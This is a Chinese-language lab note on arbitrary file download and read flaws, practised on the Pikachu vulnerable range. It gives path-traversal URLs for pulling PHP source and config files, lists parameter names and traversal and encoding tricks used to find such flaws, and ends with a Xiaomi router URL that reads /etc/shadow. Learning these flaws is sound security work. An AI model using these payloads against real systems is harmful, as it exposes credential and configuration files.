6.1文件下载、读取

文件下载验证（靶场pikaqu）

靶场报错:mysqli_connect(): (HY000/1045)

解决办法：修改数据库文件密码与本地mysql密码一致；
/WWW/pikachu/inc/config.php和/WWW/pikachu /pkxss/inc/inc/config.php

之后访问http://www.pikaqu:81/install.php重新配置即可

1、文件下载得到文件地址如下；

下载地址为http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=ai.png

图片地址为http://www.pikaqu:81/vul/unsafedownload/download/ai.png

2、反推下载php文件地址为

http://www.pikaqu:81/vul/unsafedownload/download/execdownload.php

3、下载改php需跳到前一级目录，则为unsafedownload下

`http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=../execdownload.php``

4、下载到文件之后，通过对以下载到php文件代码进一步分析，进行进一步文件下载路径探测；

下载根目录下inc/function.php文件；

http://www.pikaqu:81/vul/unsafedownload/execdownload.php?filename=../../../inc/function.php

5、探测数据库或敏感文件地址；

• 扫描工具或扫描地址（目录扫描探测，字典大）
• 下载好代码分析和文件包含获取

6、使用大字典进行目录探测数据库配置文件，config.inc.php

如何判断含义文件下载功能点

1、判断参数值

read.xxx?filename=
down.xxx?filename=
readfile.xxx?filename=
downfile.xxx?filename=
../ ..\ ./ .\
%00 ?%23 %20等
&readpath= &filepath=   &path= &url=  &data= &readfile=

2、java中web.xml/WEB-INF文件

文件读取

思路：任意文件代码读取；

小米路由器任意文件读取

http://x.x.x/api-third-party/download/extdisks../etc/shadow
即可下载到